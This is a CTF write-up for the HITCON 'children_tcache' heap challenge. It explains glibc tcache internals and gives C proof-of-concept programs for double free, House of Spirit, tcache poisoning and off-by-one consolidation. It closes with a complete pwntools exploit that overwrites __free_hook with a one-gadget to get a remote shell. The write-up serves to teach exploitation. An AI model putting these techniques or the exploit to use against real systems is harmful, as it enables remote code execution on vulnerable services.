children_tcache writeup and tcache overview

Event: HITCON
Category: pwn
Points: 246
Solves: 34

This article is intended for readers who already have some knowledge of heap exploitation. If you know some heap attacks on glibc < 2.26, it will be fully understandable to you. If you don’t, don’t worry: I’ve tried to make this post approachable for anyone with basic knowledge. If you know nothing about the topic, I recommend heap-exploitation (see References).

Tcache is an internal mechanism of glibc’s heap management. It was introduced in glibc 2.26 in 2017. Its objective is to speed up heap management. The older algorithms were not removed; they are still used in some cases, for example for bigger chunks or when the appropriate tcache bin is full. Heap exploitation with this mechanism is a lot easier, though, due to a lack of heap integrity checks.

The convention used in this post: the pointer to the next chunk is called fd and the pointer to the previous chunk is called bk, as in a normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. All the source code that interests us is located in the file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

tcache_put can be called near the beginning of _int_free, and tcache_get near the beginning of __libc_malloc. tcache_put is called when the freed chunk corresponds to a requested size of at most 0x408 bytes and the tcache bin for that size is not full. The maximum number of chunks in one tcache bin is mp_.tcache_count, which is 7 by default. The default comes from the following definition:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk whose size fits a tcache bin and that bin contains at least one chunk. Every tcache bin holds chunks of only one size. From the code above we can see that a bin is a singly linked list, similar to a fastbin: each entry contains only a pointer to the next chunk. The list is also LIFO, like in fastbins. There is one difference: each tcache bin remembers how many chunks it holds in tcache->counts[tc_idx].
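To make the list behaviour concrete, here is a minimal Python 3 sketch of a single tcache bin. It is a toy model, not glibc code: the class name `TcacheBin` and the dictionary that stands in for memory are assumptions made for illustration, and the addresses are the ones from the pwndbg session in this post.

```python
class TcacheBin:
    """Toy model of one tcache bin (hypothetical helper, not glibc code)."""

    def __init__(self):
        self.head = None   # plays the role of tcache->entries[tc_idx]
        self.count = 0     # plays the role of tcache->counts[tc_idx]
        self.next = {}     # chunk address -> value stored in e->next

    def put(self, chunk):
        # Like tcache_put: push at the head, no integrity checks at all.
        self.next[chunk] = self.head
        self.head = chunk
        self.count += 1

    def get(self):
        # Like tcache_get: pop from the head.
        chunk = self.head
        self.head = self.next[chunk]
        self.count -= 1
        return chunk


bin_0x60 = TcacheBin()
bin_0x60.put(0x555555559670)   # freed first
bin_0x60.put(0x5555555596D0)   # freed second, ends up at the head
first = bin_0x60.get()
second = bin_0x60.get()
print(hex(first), hex(second), bin_0x60.count)
```

The chunk freed last comes back first, which is the LIFO order described above.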

Strangely, calloc doesn’t allocate from tcache bins.

If you want to test how tcache behaves, you can compile malloc_playground and run it under pwndbg.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 
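The bin labels in the session above (0x60 for malloc 0x50, 0x70 for malloc 0x61) follow from how a request size is rounded up to a chunk size. The sketch below reproduces that arithmetic in Python 3 for x86-64. The function names mirror glibc macros, but the code is a re-implementation written for this post, and the constants assume a 64-bit build.

```python
SIZE_SZ = 8               # sizeof(size_t) on x86-64 (assumption: 64-bit build)
MALLOC_ALIGN_MASK = 0xF   # chunks are 16-byte aligned
MINSIZE = 0x20            # smallest possible chunk
TCACHE_MAX_BINS = 64


def request2size(req):
    """Chunk size used for a malloc(req) request."""
    size = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


def csize2tidx(csize):
    """Index of the tcache bin that serves chunks of size csize."""
    return (csize - MINSIZE + MALLOC_ALIGN_MASK) // 16


def uses_tcache(req):
    return csize2tidx(request2size(req)) < TCACHE_MAX_BINS


for req in (0x50, 0x61, 0x408, 0x409):
    print(hex(req), hex(request2size(req)), uses_tcache(req))
```

Under these assumptions 0x408 is the largest request that still maps to a tcache bin, which matches the limit mentioned earlier.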

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
}

As a result, we got the same pointer 2 times.
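Why the same pointer comes back twice can be seen in a small Python 3 model of the list operations. This is only a sketch: the address is hypothetical and `free`/`malloc` here are toy functions that imitate tcache_put and tcache_get, not the real allocator.

```python
head = None   # stands in for tcache->entries[tc_idx]
nxt = {}      # chunk address -> value stored in e->next


def free(chunk):
    """Push the chunk, like tcache_put: nothing checks if it is already listed."""
    global head
    nxt[chunk] = head
    head = chunk


def malloc():
    """Pop the head, like tcache_get."""
    global head
    chunk = head
    head = nxt[chunk]
    return chunk


a = 0x1000    # hypothetical chunk address
free(a)       # list: a -> NULL
free(a)       # list: a -> a, the entry now points at itself
first, second = malloc(), malloc()
print(hex(first), hex(second))
```

After the second free the entry points at itself, so every following allocation of that size returns the same address.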

On older glibc (< 2.26), getting the same result is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
}

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk in between because of an integrity check: a chunk cannot be added to a fastbin list when the same chunk is already at the top of that list. printf is called at the beginning because the program crashes otherwise. This is probably because the first call to printf initializes its buffer by allocating memory with malloc.
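The fastbin check and the way around it can be sketched in Python 3. The `Fastbin` class is a hypothetical toy model that only imitates the "same chunk on top" test; the addresses are taken from the output above.

```python
class Fastbin:
    """Toy model of one fastbin with only the 'same chunk on top' check."""

    def __init__(self):
        self.top = None
        self.fd = {}   # chunk address -> fd pointer

    def free(self, chunk):
        if chunk == self.top:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fd[chunk] = self.top
        self.top = chunk

    def malloc(self):
        chunk = self.top
        self.top = self.fd[chunk]
        return chunk


A, B = 0x602420, 0x602460

# Freeing the same chunk twice in a row is rejected.
direct = Fastbin()
direct.free(A)
try:
    direct.free(A)
    rejected = False
except RuntimeError:
    rejected = True

# Freeing another chunk in between passes the check.
bypass = Fastbin()
for chunk in (A, B, A):
    bypass.free(chunk)
order = [bypass.malloc() for _ in range(3)]
print(rejected, [hex(c) for c in order])
```

The allocation order in the model is a, b, a, the same pattern as in the program output.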

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing a region that was never allocated, we put it on the tcache bin list. We can then obtain this region when malloc is called with an appropriate size. This is useful when we are able to overwrite a pointer, for example through a buffer overflow.

In older glibc this takes more effort because of an additional sanity check: we need to create another fake chunk right after the freed one. Like here.

tcache/fastbin poisoning

If we want malloc to return a pointer to a location we control, we can simply overwrite a freed chunk’s pointer to the next chunk. We can forget about the integrity check that the older mechanism performs:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin for this size contains: b -> a 
	b[0]=(long)&var;
	// tcache bin for this size contains: b -> var
	malloc(0x38);
	// tcache bin for this size contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remembers how many chunks belong to it.
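The pointer overwrite itself can be modelled in a few lines of Python 3. This is a sketch with hypothetical addresses: the `memory` dictionary stands in for the first 8 bytes of each chunk’s user data, which is where the next pointer lives once the chunk is in the tcache.

```python
memory = {}   # address -> first 8 bytes of user data (holds e->next when freed)
head = None   # stands in for tcache->entries[tc_idx]


def free(chunk):
    global head
    memory[chunk] = head
    head = chunk


def malloc():
    global head
    chunk = head
    head = memory.get(chunk)   # the stored next pointer is trusted as-is
    return chunk


a, b, var = 0x1000, 0x1040, 0x601060   # hypothetical addresses
free(a)
free(b)             # bin: b -> a
memory[b] = var     # write through the dangling pointer, like b[0] = &var
first = malloc()    # returns b, bin: var
second = malloc()   # returns var
print(hex(first), hex(second))
```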

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

This program prints the fd of a chunk in the unsorted bin. The fd of the last chunk and the bk of the first chunk in the unsorted bin are set to a pointer into libc.

If we can only request allocations of at most 0x100 bytes, this won’t work, because the freed chunk goes to a tcache bin instead of the unsorted bin. The following works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Fortunately, if we fill the tcache bin (its maximum capacity is 7 chunks), the next deallocated chunk is put in the unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
}
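The effect of the 7-chunk limit can be sketched as a Python 3 toy model. It deliberately ignores everything except the capacity check (no consolidation, no other bins), and the chunk addresses are hypothetical.

```python
TCACHE_COUNT = 7   # default mp_.tcache_count

tcache = []        # chunks held by the tcache bin for this size
unsorted = []      # chunks that fell through to the unsorted bin


def free(chunk):
    """Simplified free: tcache first, unsorted bin once the tcache bin is full."""
    if len(tcache) < TCACHE_COUNT:
        tcache.append(chunk)
    else:
        unsorted.append(chunk)


# chunks[0] plays the role of a, chunks[1:] the role of t[0..6]
chunks = [0x1000 + i * 0x110 for i in range(8)]
for chunk in chunks[1:]:
    free(chunk)    # fills the tcache bin
free(chunks[0])    # the 8th free no longer fits
print(len(tcache), [hex(c) for c in unsorted])
```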

tcache attacks summary

More attacks exist for glibc with tcache. For example, House of Force works the same way as before. It’s also easy to create overlapping chunks by overwriting a size field with a bigger value. Overall, heap exploitation became much easier after tcache was introduced. The exception is a buffer overflow by a single NULL byte, as in the children tcache CTF task. There I used an old attack with chunks of smallbin size, and prevented them from going into the tcache by filling the tcache bins first.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

The decompiled binary looks like this:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can:

create a chunk on the heap and read data into it
delete a chunk
print the data in a chunk

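Everything is fine except the new_heap function, which is vulnerable to a buffer overflow by a single NULL byte: when the data fills all size bytes, strcpy writes its terminating NULL byte one byte past the end of the chunk. Before free, the chunk is filled with 0xDA bytes. We can have at most 10 chunks allocated at the same time, and the maximum requested size of a chunk is 0x2000.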
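The one-byte overflow can be reproduced offline with a Python 3 model of strcpy. This is a sketch under assumptions: the `strcpy` helper is a hypothetical stand-in for the C function, and the buffer layout (0xf8 usable bytes followed by the size field of the next chunk, which starts as 0x101) assumes a malloc(0xf8) chunk followed by another 0x100-byte chunk.

```python
import struct


def strcpy(dst, offset, src):
    """Copy src up to its first NUL, then write the terminating NUL, like C strcpy."""
    data = src.split(b"\x00")[0] + b"\x00"
    dst[offset:offset + len(data)] = data


USABLE = 0xF8                      # usable bytes of a malloc(0xf8) chunk
heap = bytearray(USABLE + 8)       # user data followed by the next chunk's size field
struct.pack_into("<Q", heap, USABLE, 0x101)   # 0x100 | PREV_INUSE

strcpy(heap, 0, b"b" * USABLE)     # data fills the chunk exactly
next_size = struct.unpack_from("<Q", heap, USABLE)[0]
print(hex(next_size))
```

The terminating byte lands on the lowest byte of the next size field, which is where the PREV_INUSE bit is stored.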

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free a chunk of smallbin size, free checks whether its neighbours are free. If so, the chunks are consolidated. When we free chunk c, it consolidates with a and b for two reasons:

We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.
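The value 0x210 can be checked against the addresses printed above. The following Python 3 sketch assumes x86-64 chunk layout (16-byte header, 16-byte alignment); `chunk_size` is a helper written for this post.

```python
def chunk_size(req):
    """Chunk size for a malloc(req) request on x86-64 (assumed layout)."""
    return max((req + 8 + 0xF) & ~0xF, 0x20)


a_size = chunk_size(0x108)
b_size = chunk_size(0xF8)
prev_size = a_size + b_size            # value written into c's prev_size field

a_mem, b_mem = 0x602010, 0x602120      # user pointers from the output above
c_chunk = (b_mem - 0x10) + b_size      # start of chunk c (header included)
merged_start = c_chunk - prev_size     # where free(c) believes the previous chunk starts

print(hex(a_size), hex(b_size), hex(prev_size), hex(merged_start))
```

With the fake prev_size, the start of the "previous chunk" is exactly the start of chunk a, so the consolidated chunk covers a, b and c.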

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped the allocation and deletion of chunk B because it is not needed. After c is freed, the unsorted bin holds one chunk covering the combined area of a, b and c. When we allocate chunk A, that chunk is split into 2 parts. One part is returned by malloc; the other part remains in the unsorted bin and begins at the same place as b.

In our examples, the first allocated chunk has a different size than the others: 0x108. The example would also work with 0xf8, but this challenge uses strcpy, which stops at a NULL byte, so we couldn’t overwrite prev_size with the value 0x200 (its lowest byte is NULL). With a size of 0x108 we can set prev_size to 0x210.
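The difference between the two values is visible in their little-endian encoding. The Python 3 sketch below uses a hypothetical helper, `survives_strcpy`, that checks whether all significant bytes of a value come before its first NULL byte.

```python
import struct


def survives_strcpy(value):
    """True if strcpy would copy every significant byte of the 64-bit value."""
    raw = struct.pack("<Q", value)      # little-endian, as stored in memory
    copied = raw.split(b"\x00")[0]      # strcpy stops at the first NUL byte
    return copied == raw.rstrip(b"\x00")


print(struct.pack("<Q", 0x200).hex(), survives_strcpy(0x200))
print(struct.pack("<Q", 0x210).hex(), survives_strcpy(0x210))
```

0x200 starts with a NULL byte in memory, so strcpy copies nothing of it, while 0x210 is the two bytes 0x10 0x02 followed only by zeros.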

We can accomplish the same attack on a newer libc by using the same algorithm. There is one difference: before freeing the chunks we need to fill the tcache bins. The code below performs the same leak as the previous attack and then goes further. After the leak, it causes a double free, because B and b point to the same chunk (requested size 0x1f8). Finally, tcache poisoning is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = (long)&var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060
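The leaked value can be turned into a libc base address with the offsets that the exploit further down uses. This Python 3 sketch assumes the run above used the same libc build as the challenge (2.27-3ubuntu1); with another build the offsets differ.

```python
# Offsets taken from the exploit in this post; valid only for that libc build.
UNSORTED_LEAK_OFFSET = 0x3EBCA0   # leaked pointer minus libc base
FREE_HOOK_OFFSET = 0x3ED8E8       # __free_hook minus libc base

leak = 0x7F60C1026CA0             # "b content" from the output above
libc_base = leak - UNSORTED_LEAK_OFFSET
free_hook = libc_base + FREE_HOOK_OFFSET

print(hex(libc_base), hex(free_hook))
```

A page-aligned result (low 12 bits zero) is a quick sanity check that the offset matches the library.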

The last step is to implement the exploit in Python. It does the same thing as the previous code, except that malloc returns a region at &__free_hook. We then overwrite __free_hook with a one-gadget RCE address and call free to trigger it.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricky because data is copied into the chunk by strcpy, which
# stops copying at a NULL byte.
# To zero a region we need to free and reallocate the chunk several
# times, each time with a size one byte smaller than the previous one.
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c has prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are full
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)
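The prev_size clearing loop in the exploit can be checked offline. The Python 3 sketch below replays the writes on a byte buffer. It is a model under assumptions: `new_heap` and `delete_heap` here are local toy functions that imitate only the strcpy and the memset of the binary, every allocation is assumed to return the same chunk b, and the tcache next pointer written by free is ignored because it does not touch the bytes of interest.

```python
def new_heap(chunk, size, data):
    """Imitate new_heap: strcpy of at most size bytes plus the terminating NUL."""
    copied = data[:size].split(b"\x00")[0] + b"\x00"
    chunk[:len(copied)] = copied
    return size


def delete_heap(chunk, size):
    """Imitate delete_heap: fill the recorded size with 0xDA before free."""
    chunk[:size] = b"\xda" * size


# b's 0xf8 user bytes followed by the size field of chunk c (0x100 | PREV_INUSE)
chunk = bytearray(0x100)
chunk[0xF8:0x100] = (0x101).to_bytes(8, "little")

size = new_heap(chunk, 0xF8, b"b" * 0xF8)          # clears PREV_INUSE of c
for i in range(0xF8, 0xF3, -1):
    delete_heap(chunk, size)
    size = new_heap(chunk, i - 1, b"b" * (i - 1))  # NUL lands at offset i-1
delete_heap(chunk, size)
size = new_heap(chunk, 0xF2, b"b" * 0xF0 + b"\x10\x02")

prev_size = int.from_bytes(chunk[0xF0:0xF8], "little")
c_size = int.from_bytes(chunk[0xF8:0x100], "little")
print(hex(prev_size), hex(c_size))
```

Each shorter allocation leaves one more NULL byte behind, because the following memset only covers the recorded (smaller) size.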

References

heap-exploitation - a good book to start heap exploitation